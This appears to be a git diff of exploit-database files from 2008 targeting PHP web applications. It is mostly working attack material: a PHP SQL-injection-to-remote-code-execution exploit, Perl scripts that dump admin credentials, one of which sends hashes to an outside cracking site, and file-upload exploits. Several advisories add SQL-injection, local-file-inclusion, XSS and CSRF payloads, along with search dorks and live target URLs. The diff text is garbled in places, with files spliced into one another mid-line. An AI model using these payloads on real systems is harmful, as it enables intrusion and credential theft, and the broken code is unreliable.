+++ b/platforms/php/webapps/4081.php
@@ -1,225 +1,225 @@
-#!/usr/bin/php -q -d short_open_tag=on
-'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-function head(){
-
-	print "-------------------------------------------------------------------------\r\n";
-	print "        Jasmine CMS 1.0 SQL Injection/Remote Code Execution Exploit\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-}
-
-function footer(){
-
-	print "-------------------------------------------------------------------------\r\n";
-	print "            		 http://www.w4ck1ng.com\r\n";
-	print "            		        ...Silentz\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-}
-
-
-if ($exploit==0){
-
-head();
-
-$code="";
-$packet="GET " . $p . $code . " HTTP/1.0\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
-$packet.="Host: " . $host . "\r\n";
-$packet.="Connection: close\r\n\r\n";
-sendpacketii($packet);
-
-$sql = "' UNION SELECT id,username,email,signature,avatar_path,joined,total_visits,status FROM user WHERE id = '1'/*";
-
-$data="login_username=" . $sql;
-$data.="&login_password=";
-$data.="login=Login";
-$packet ="POST " . $path . "login.php HTTP/1.1\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-
-if (strstr($html,"302 Found")){}
-else{print "[-] Exploit Failed...\r\n"; footer(); exit();}
-$temp=explode("Set-Cookie: ",$html);
-$temp2=explode(" ",$temp[1]);
-$cookie=$temp2[0];
-
-$paths= array (
-"../../../../../var/log/httpd/access_log",
-"../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../logs/error.log",
-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"../../../../../etc/httpd/logs/access_log",
-"../../../../../etc/httpd/logs/access.log",
-"../../../../../etc/httpd/logs/error_log",
-"../../../../../etc/httpd/logs/error.log",
-"../../../../../var/www/logs/access_log",
-"../../../../../var/www/logs/access.log",
-"../../../../../usr/local/apache/logs/access_log",
-"../../../../../usr/local/apache/logs/access.log",
-"../../../../../var/log/apache/access_log",
-"../../../../../var/log/apache/access.log",
-"../../../../../var/log/access_log",
-"../../../../../var/www/logs/error_log",
-"../../../../../var/www/logs/error.log",
-"../../../../../usr/local/apache/logs/error_log",
-"../../../../../usr/local/apache/logs/error.log",
-"../../../../../var/log/apache/error_log",
-"../../../../../var/log/apache/error.log",
-"../../../../../var/log/access_log",
-"../../../../../var/log/error_log"
-);
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-$a=$i+2;
-
-$packet ="GET " . $path . "admin/plugin_manager.php?u=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n";
-$packet.="Host: " . $host . "\r\n"; 
-$packet.="Cookie: " . $cookie . "\r\n";
-$packet.="Connection: Close\r\n\r\n";
-
-sendpacketii($packet);
-
-if (strstr($html,"w4ckw4ck"))
-    {
-     $temp=explode("w4ckw4ck",$html);
-        print $temp[1];
-        footer(); exit;
-    }
-  }
-}
-
-if($exploit==1){
-
-    $sql = "news.php?item=-999/**/UNION/**/SELECT/**/0,password,0,0,0,0,username/**/FROM/**/user/**/WHERE/**/id=1/*";
-    $packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
-    $packet.="Host: " . $host . "\r\n";
-    $packet.="User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
-    $packet.="Connection: Close\r\n\r\n";
-    sendpacketii($packet);
-
-    $temp = explode("Posted by ",$html);
-    $temp2 = explode("at ",$temp[1]);
-    $username = $temp2[0];
-
-    $temp = explode("    		",$html);
-    $temp2 = explode("",$html);
+    $temp2 = explode("(.*)a href=\"(.*)\"(.*)>(.*)<\/a><\/td>/gmi)
-  {
-     $user = $4;
-     print "\n [+] Admin user retrieved: $user\n";
-     print "\n [~] Retrieving password for $user\n";
-     getPass( )
-  }
-  else {
-      print "\n [-] Unable to retrieve admin username\n";
-      print "\n [~] Retrieving password\n";
-      getPass( )
-  }
-}
-
-sub getPass( ) {
-
-  $passres = $ua->get("http://$host/$pject");
-
-  $passCon = $passres->content;
-
-  if ($passCon =~ /(.*)a href=\"(.*)\"(.*)>([a-f0-9]{32})<\/a><\/td>/gmi)
-  {
-     $pass = $4;
-     print "\n [+] Admin password retrieved: $pass\n";
-     &resolveHash($pass);
-     system("color 7");
-  }
-  else {
-      print "\n [-] Unable to retrieve admin password\n";
-      system("color 7");
-      exit(0);
-  }
-}
-
-sub resolveHash($)
-{
-  print "\n [~] Attempting to resolve hash\n";
-  $hashget = LWP::UserAgent->new;  #thx gdata
-  $resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$_[0]"); # checks gdata for hash
-  $hashans = $resp->content;
-  if ($hashans =~ m\width="35%">([  -_a-z0-9.*?&=;<>/""]{1,25})(.*)a href=\"(.*)\"(.*)>(.*)<\/a><\/td>/gmi)
+  {
+     $user = $4;
+     print "\n [+] Admin user retrieved: $user\n";
+     print "\n [~] Retrieving password for $user\n";
+     getPass( )
+  }
+  else {
+      print "\n [-] Unable to retrieve admin username\n";
+      print "\n [~] Retrieving password\n";
+      getPass( )
+  }
+}
+
+sub getPass( ) {
+
+  $passres = $ua->get("http://$host/$pject");
+
+  $passCon = $passres->content;
+
+  if ($passCon =~ /(.*)a href=\"(.*)\"(.*)>([a-f0-9]{32})<\/a><\/td>/gmi)
+  {
+     $pass = $4;
+     print "\n [+] Admin password retrieved: $pass\n";
+     &resolveHash($pass);
+     system("color 7");
+  }
+  else {
+      print "\n [-] Unable to retrieve admin password\n";
+      system("color 7");
+      exit(0);
+  }
+}
+
+sub resolveHash($)
+{
+  print "\n [~] Attempting to resolve hash\n";
+  $hashget = LWP::UserAgent->new;  #thx gdata
+  $resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$_[0]"); # checks gdata for hash
+  $hashans = $resp->content;
+  if ($hashans =~ m\width="35%">([  -_a-z0-9.*?&=;<>/""]{1,25})
    XSS: 

    
-            
     search only in topics
     search in topics and answers
    XSS: 

    
+            
     search only in topics
     search in topics and answers
    
+       value : your name (corresponding to ID)
+      
+    And now edit the other settings change via web browser.After that,use this CSRF wisely.
+
+[+] Here is the HTML code :   
+
+
+        
+
+    
    $forum
    ";
-
----------
- Exploit
----------
-
-[+] http://[Target]/[jubb_path]/viewforum.php?forum=
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-20]
+===============================================================
+  JaxUltraBB <= 2.0 (LFI/XSS) Multiple Remote Vulnerabilities
+===============================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 20 June 2008
+SITE   : www.citec.us
+
+
+#####################################################
+ APPLICATION : JaxUltraBB
+ VERSION     : <= 2.0
+ DOWNLOAD    : http://downloads.sourceforge.net/jubb/
+#####################################################
+
+--- Local File Inclusion ---
+
+-----------------------------------
+ Vulnerable File [viewprofile.php]
+-----------------------------------
+@Line 8-9
+
+   8: $userfile = file_get_contents("users/".$_GET['user'].".JaxSQL");
+   9: $onlinefile = file_get_contents("users/".$_GET['user']."online.JaxSQL");
+
+--------------
+ POC Exploits
+--------------
+
+[+] http://192.168.24.25/jubb/viewprofile.php?user=../../../../../../../../boot.ini%00
+
+
+    This exploit will open boot.ini in system file:
+
+[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
+
+    You can change boot.ini to /etc/passwd%00 in linux OS.
+
+
+--- Remote XSS Exploit ---
+
+---------------------------------
+ Vulnerable File [viewforum.php]
+---------------------------------
+
+@Line 
+
+  14: $forum = $_GET['forum'];
+
+  15: online_moved("Viewing ".$_GET['forum']);
+
+  17: $forumfile = fopen("topics/".$forum."topics.JaxSQL", "at");
+  18: $topicsfile = file_get_contents("topics/".$forum."topics.JaxSQL", "at");
+  19: echo "


    
-
+
-...
-
-#################################################
-
-Example:
-
-http://[server]/[installdir]/themes/default/layouts/basic_header.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
-
-
-10. Local File Include vulnerabilities found in scripts:
-
-themes/blog/layouts/print.php 
-themes/default/layouts/print.php
-themes/portfolio/layouts/print.php
-themes/snazzy/layouts/print.php
-
-Code
-****
-#################################################
-
-if(!isset($page_include)) {
-        if($page_ck['custom'] == '0') include("./pages/".$page."/default/content.php");
-        else include("./pages/custom/".$page."/default/content.php");
-} else include("./themes/".$theme_dir."/templates/".$page_include);
-include("./themes/".$theme_dir."/templates/footer.tpl");
-
-#################################################
-
-Example:
-
-http://[server]/[installdir]/themes/blog/layouts/print.php?page=../../../../../../../../../../../../../boot.ini%00
-http://[server]/[installdir]/themes/default/layouts/print.php?page_include=../../../../../../../../../../../../../boot.ini%00
-http://[server]/[installdir]/themes/portfolio/layouts/print.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
-
-
-
-11. Local File Include vulnerabilities found in scripts: 
-
-themes/blog/layouts/total.php
-themes/default/layouts/total.php
-themes/portfolio/layouts/total.php
-themes/snazzy/layouts/total.php
-
-Code
-****
-#################################################
-
-    
-  
-  
-    
+...
+
+#################################################
+
+Example:
+
+http://[server]/[installdir]/themes/default/layouts/basic_header.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
+
+
+10. Local File Include vulnerabilities found in scripts:
+
+themes/blog/layouts/print.php 
+themes/default/layouts/print.php
+themes/portfolio/layouts/print.php
+themes/snazzy/layouts/print.php
+
+Code
+****
+#################################################
+
+if(!isset($page_include)) {
+        if($page_ck['custom'] == '0') include("./pages/".$page."/default/content.php");
+        else include("./pages/custom/".$page."/default/content.php");
+} else include("./themes/".$theme_dir."/templates/".$page_include);
+include("./themes/".$theme_dir."/templates/footer.tpl");
+
+#################################################
+
+Example:
+
+http://[server]/[installdir]/themes/blog/layouts/print.php?page=../../../../../../../../../../../../../boot.ini%00
+http://[server]/[installdir]/themes/default/layouts/print.php?page_include=../../../../../../../../../../../../../boot.ini%00
+http://[server]/[installdir]/themes/portfolio/layouts/print.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
+
+
+
+11. Local File Include vulnerabilities found in scripts: 
+
+themes/blog/layouts/total.php
+themes/default/layouts/total.php
+themes/portfolio/layouts/total.php
+themes/snazzy/layouts/total.php
+
+Code
+****
+#################################################
+
+    
+  
+  
+    
-       value : your name (corresponding to ID)
-      
-    And now edit the other settings change via web browser.After that,use this CSRF wisely.
-
-[+] Here is the HTML code :   
-
-
-        
-
-    
    $forum
    ";
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[jubb_path]/viewforum.php?forum=
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5878.txt b/platforms/php/webapps/5878.txt
index 197aa8c6a..5cc7c43e0 100755
--- a/platforms/php/webapps/5878.txt
+++ b/platforms/php/webapps/5878.txt
@@ -1,19 +1,19 @@
-################################################## #######################
-#
-# AUTHOR : TurkishWarriorr
-#
-# HOME : http://www.1923turk.org
-#
-################################################## #######################
-Dork : Powered by emuCMS
-
-exploit : index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users--
-
-Test Sites
-
-http://www.emusoft.org/index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users--
-################################################## ########################
-www.1923turk.org 
-turkish-warriorr@hotmail.com
-
-# milw0rm.com [2008-06-20]
+################################################## #######################
+#
+# AUTHOR : TurkishWarriorr
+#
+# HOME : http://www.1923turk.org
+#
+################################################## #######################
+Dork : Powered by emuCMS
+
+exploit : index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users--
+
+Test Sites
+
+http://www.emusoft.org/index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users--
+################################################## ########################
+www.1923turk.org 
+turkish-warriorr@hotmail.com
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5879.txt b/platforms/php/webapps/5879.txt
index 84de0f212..30d885107 100755
--- a/platforms/php/webapps/5879.txt
+++ b/platforms/php/webapps/5879.txt
@@ -1,56 +1,56 @@
-#########################################################################
-#################### Viva IslaM Viva IslaM ##############################
-##
-## Remote SQL Injection Vulnerability
-##
-## PHPAuction ( profile.php user_id )
-##
-#########################################################################
-#########################################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
-##
-## Email  : SQL@Hotmail.it
-##
-## !! SYRIAN HaCkErS  !!
-########################
-########################
-##
-## Script  : PHPAuction
-##
-## site    : www.phpauctions.info
-##
-########################
-########################
-##
-## D0rk1 : allinurl: "profile.php?user_id" auction_id
-##
-## D0rk2 : allinurl: "active_auctions.php" user_id
-##
-##     -(:: SQL ::)-
-##
-##    www.site.com/
-##         profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*
-##
-##  -(:: L!VE DEMO ::)-
-##
-##    http://phpauctions.info/phpauction/demo/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*
-##
-##    http://phpauctions.info/phpauction/demo/viewfaqs.php?cat=null
-#######################
-#######################
- -(:: Note ::)-
-This script not >> (( phpAuction GPL ))  (( password Md5 ))
-
-#######################################################################################################
-#######################################################################################################
-
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-06-20]
+#########################################################################
+#################### Viva IslaM Viva IslaM ##############################
+##
+## Remote SQL Injection Vulnerability
+##
+## PHPAuction ( profile.php user_id )
+##
+#########################################################################
+#########################################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
+##
+## Email  : SQL@Hotmail.it
+##
+## !! SYRIAN HaCkErS  !!
+########################
+########################
+##
+## Script  : PHPAuction
+##
+## site    : www.phpauctions.info
+##
+########################
+########################
+##
+## D0rk1 : allinurl: "profile.php?user_id" auction_id
+##
+## D0rk2 : allinurl: "active_auctions.php" user_id
+##
+##     -(:: SQL ::)-
+##
+##    www.site.com/
+##         profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*
+##
+##  -(:: L!VE DEMO ::)-
+##
+##    http://phpauctions.info/phpauction/demo/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*
+##
+##    http://phpauctions.info/phpauction/demo/viewfaqs.php?cat=null
+#######################
+#######################
+ -(:: Note ::)-
+This script not >> (( phpAuction GPL ))  (( password Md5 ))
+
+#######################################################################################################
+#######################################################################################################
+
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5880.txt b/platforms/php/webapps/5880.txt
index ffb3cd55f..fd2117d4c 100755
--- a/platforms/php/webapps/5880.txt
+++ b/platforms/php/webapps/5880.txt
@@ -1,60 +1,60 @@
-===========================================================
-  SiteXS CMS (Upload/XSS) Multiple Remote Vulnerabilities
-===========================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 21 June 2008
-SITE   : www.citec.us
-
-
-#####################################################
- APPLICATION : SiteXS CMS
- VERSION     : 0.1.1
- DOWNLOAD    : http://downloads.sourceforge.net/sitexs
-#####################################################
-
----Arbitrary File Upload Exploit---
-
-	This Vulnerability can upload malicious files direct to web server.
-
-[Login as user]
-
-[+] Upload Path: http://[Target]/adm/?chid=4
-
-[+] Shell Script: http://[Target]/download/[Evil File]
-
-
---- Remote XSS Exploit ---
-
--------------
- POC Exploit
--------------
-
-[+] POST http://192.168.24.25/adm/ HTTP/1.0
-[+] Accept: */*
-[+] Content-Type: application/x-www-form-urlencoded
-[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
-[+] Host: 192.168.24.25
-[+] Content-Length: 44
-[+] Cookie: PHPSESSID=aa2ded55802cd2b6fe7c304258d858f5
-[+]
-[+] user=admin'&pass=test
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-21]
+===========================================================
+  SiteXS CMS (Upload/XSS) Multiple Remote Vulnerabilities
+===========================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 21 June 2008
+SITE   : www.citec.us
+
+
+#####################################################
+ APPLICATION : SiteXS CMS
+ VERSION     : 0.1.1
+ DOWNLOAD    : http://downloads.sourceforge.net/sitexs
+#####################################################
+
+---Arbitrary File Upload Exploit---
+
+	This Vulnerability can upload malicious files direct to web server.
+
+[Login as user]
+
+[+] Upload Path: http://[Target]/adm/?chid=4
+
+[+] Shell Script: http://[Target]/download/[Evil File]
+
+
+--- Remote XSS Exploit ---
+
+-------------
+ POC Exploit
+-------------
+
+[+] POST http://192.168.24.25/adm/ HTTP/1.0
+[+] Accept: */*
+[+] Content-Type: application/x-www-form-urlencoded
+[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
+[+] Host: 192.168.24.25
+[+] Content-Length: 44
+[+] Cookie: PHPSESSID=aa2ded55802cd2b6fe7c304258d858f5
+[+]
+[+] user=admin'&pass=test
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-21]
diff --git a/platforms/php/webapps/5881.txt b/platforms/php/webapps/5881.txt
index cbeef101d..621879776 100755
--- a/platforms/php/webapps/5881.txt
+++ b/platforms/php/webapps/5881.txt
@@ -1,48 +1,48 @@
-#########################################################################
-#################### Viva IslaM Viva IslaM ##############################
-##
-## Remote SQL Injection Vulnerability
-##
-## @CMS 2.1.1 ( readarticle.php article_id )
-##
-#########################################################################
-#########################################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
-##
-## Email  : SQL@Hotmail.it
-##
-## !! SYRIAN HaCkErS  !!
-########################
-########################
-##
-## Script  : @CMS 2.1.1
-##
-## site    : www.atcode.net
-##
-########################
-########################
-##  -(:: SQL ::)-
-##
-##    www.site.de/readarticle.php?article_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/*
-##
-##    and
-##
-##    www.site.com/articles.php?cat_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/*
-##
-#######################
-#######################
-
-
-#######################################################################################################
-#######################################################################################################
-
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-06-21]
+#########################################################################
+#################### Viva IslaM Viva IslaM ##############################
+##
+## Remote SQL Injection Vulnerability
+##
+## @CMS 2.1.1 ( readarticle.php article_id )
+##
+#########################################################################
+#########################################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
+##
+## Email  : SQL@Hotmail.it
+##
+## !! SYRIAN HaCkErS  !!
+########################
+########################
+##
+## Script  : @CMS 2.1.1
+##
+## site    : www.atcode.net
+##
+########################
+########################
+##  -(:: SQL ::)-
+##
+##    www.site.de/readarticle.php?article_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/*
+##
+##    and
+##
+##    www.site.com/articles.php?cat_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/*
+##
+#######################
+#######################
+
+
+#######################################################################################################
+#######################################################################################################
+
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-06-21]
diff --git a/platforms/php/webapps/5882.txt b/platforms/php/webapps/5882.txt
index 2bd51088a..d20859a40 100755
--- a/platforms/php/webapps/5882.txt
+++ b/platforms/php/webapps/5882.txt
@@ -1,29 +1,29 @@
-eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability
-
-
-Author: iLker Kandemir [MEFISTO]
-
-Script download : http://www.hotscripts.com/Detailed/81086.html
-
-script demo : http://emvvy.com/demos/enews/
-
-site : www.dumenci.net
-
-----------------------------------------------------------------
-//poc:
-
-if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
-  $deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
-                       GetSQLValueString($_GET['delete'], "int"));
-
-----------------------------------------------------------------
-
-//exploit :
-
-http://[site]/delete.php?delete=[eNews_id]
-
-----------------------------------------------------------------
-
-tnx : aLL my FriEndZ 
-
-# milw0rm.com [2008-06-21]
+eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability
+
+
+Author: iLker Kandemir [MEFISTO]
+
+Script download : http://www.hotscripts.com/Detailed/81086.html
+
+script demo : http://emvvy.com/demos/enews/
+
+site : www.dumenci.net
+
+----------------------------------------------------------------
+//poc:
+
+if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
+  $deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
+                       GetSQLValueString($_GET['delete'], "int"));
+
+----------------------------------------------------------------
+
+//exploit :
+
+http://[site]/delete.php?delete=[eNews_id]
+
+----------------------------------------------------------------
+
+tnx : aLL my FriEndZ 
+
+# milw0rm.com [2008-06-21]
diff --git a/platforms/php/webapps/5883.txt b/platforms/php/webapps/5883.txt
index 6c2c8a18f..17c6c7a56 100755
--- a/platforms/php/webapps/5883.txt
+++ b/platforms/php/webapps/5883.txt
@@ -1,41 +1,41 @@
-#########################################################################
-#################### PROUD TO BE MUSLIM ##############################
-##
-## Remote SQL Injection Vulnerability
-##
-## Knowledge Base Software Overview  ( index.php cat_id )
-##
-#########################################################################
-#########################################################################
-##
-## AuTh0r : S.L TEAM     ( FA6@L 3RROR  --- H3B@R13H)
-##
-## H0ME   : WwW.MALAKSOFT.CoM 
-
-########################
-########################
-##
-## Script  : Knowledge Base Software Overview
-##
-## site    : www.kblance.com
-##
-########################
-########################
- ## -(:: SQL ::)-
-
-##    www.site.com/
-##          index.php?main=comment&sub=index&view=&qid=3&cat_id=-3+union+select+1,concat_ws(0x3a3a,uname,pwd),3,4,5,6,7,8,9,10+from+user/*
-##
-##  -(:: L!VE DEMO ::)-
-##
-##    http://www.kblance.com/demo/index.php?main=comment&sub=index&view=&qid=3&cat_id=-3+union+select+1,concat_ws(0x3a3a,uname,pwd),3,4,5,6,7,8,9,10+from+user/*
-#######################################################################################################
-#######################################################################################################
- 
-                                  -(:: !greetz! ::)-
- 
- :: MR.SQL   :: BLACK CHEETAH :: GERMAYA-X ::  :: MusliMs HaCkErs ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-06-21]
+#########################################################################
+#################### PROUD TO BE MUSLIM ##############################
+##
+## Remote SQL Injection Vulnerability
+##
+## Knowledge Base Software Overview  ( index.php cat_id )
+##
+#########################################################################
+#########################################################################
+##
+## AuTh0r : S.L TEAM     ( FA6@L 3RROR  --- H3B@R13H)
+##
+## H0ME   : WwW.MALAKSOFT.CoM 
+
+########################
+########################
+##
+## Script  : Knowledge Base Software Overview
+##
+## site    : www.kblance.com
+##
+########################
+########################
+ ## -(:: SQL ::)-
+
+##    www.site.com/
+##          index.php?main=comment&sub=index&view=&qid=3&cat_id=-3+union+select+1,concat_ws(0x3a3a,uname,pwd),3,4,5,6,7,8,9,10+from+user/*
+##
+##  -(:: L!VE DEMO ::)-
+##
+##    http://www.kblance.com/demo/index.php?main=comment&sub=index&view=&qid=3&cat_id=-3+union+select+1,concat_ws(0x3a3a,uname,pwd),3,4,5,6,7,8,9,10+from+user/*
+#######################################################################################################
+#######################################################################################################
+ 
+                                  -(:: !greetz! ::)-
+ 
+ :: MR.SQL   :: BLACK CHEETAH :: GERMAYA-X ::  :: MusliMs HaCkErs ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-06-21]
diff --git a/platforms/php/webapps/5886.pl b/platforms/php/webapps/5886.pl
index f3ca4d6bc..bc13dc914 100755
--- a/platforms/php/webapps/5886.pl
+++ b/platforms/php/webapps/5886.pl
@@ -1,37 +1,37 @@
-#!/usr/bin/perl
-
-use strict;
-use warnings;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-
-print <);
-    
-print "Enter File Path(path to local file to upload): ";
-    chomp(my $file=);
-
-my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
-                      Content_Type => 'form-data',
-                      Content      => [ NewFile => $file ] );
-
-if($re->is_success) {
-    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
-    else { print "File Upload Is Disabled! Failed!\n"; }
-} else { print "HTTP Request Failed!\n"; }
-
-exit;
-
-# milw0rm.com [2008-06-21]
+#!/usr/bin/perl
+
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+
+print <);
+    
+print "Enter File Path(path to local file to upload): ";
+    chomp(my $file=);
+
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
+                      Content_Type => 'form-data',
+                      Content      => [ NewFile => $file ] );
+
+if($re->is_success) {
+    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
+    else { print "File Upload Is Disabled! Failed!\n"; }
+} else { print "HTTP Request Failed!\n"; }
+
+exit;
+
+# milw0rm.com [2008-06-21]
diff --git a/platforms/php/webapps/5887.pl b/platforms/php/webapps/5887.pl
index 60fb1ef28..c4f14ea00 100755
--- a/platforms/php/webapps/5887.pl
+++ b/platforms/php/webapps/5887.pl
@@ -1,47 +1,47 @@
-#!/usr/bin/perl
-
-use strict;
-use warnings;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-
-print <);
-    
-print "\nEnter Local File Path To Upload(ie: C:\\file.txt): ";
-    chomp(my $file=);
-
-my $ext   = substr $file, rindex $file, '.';
-my $fname = int rand 9999;
-my $ua    = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );
-
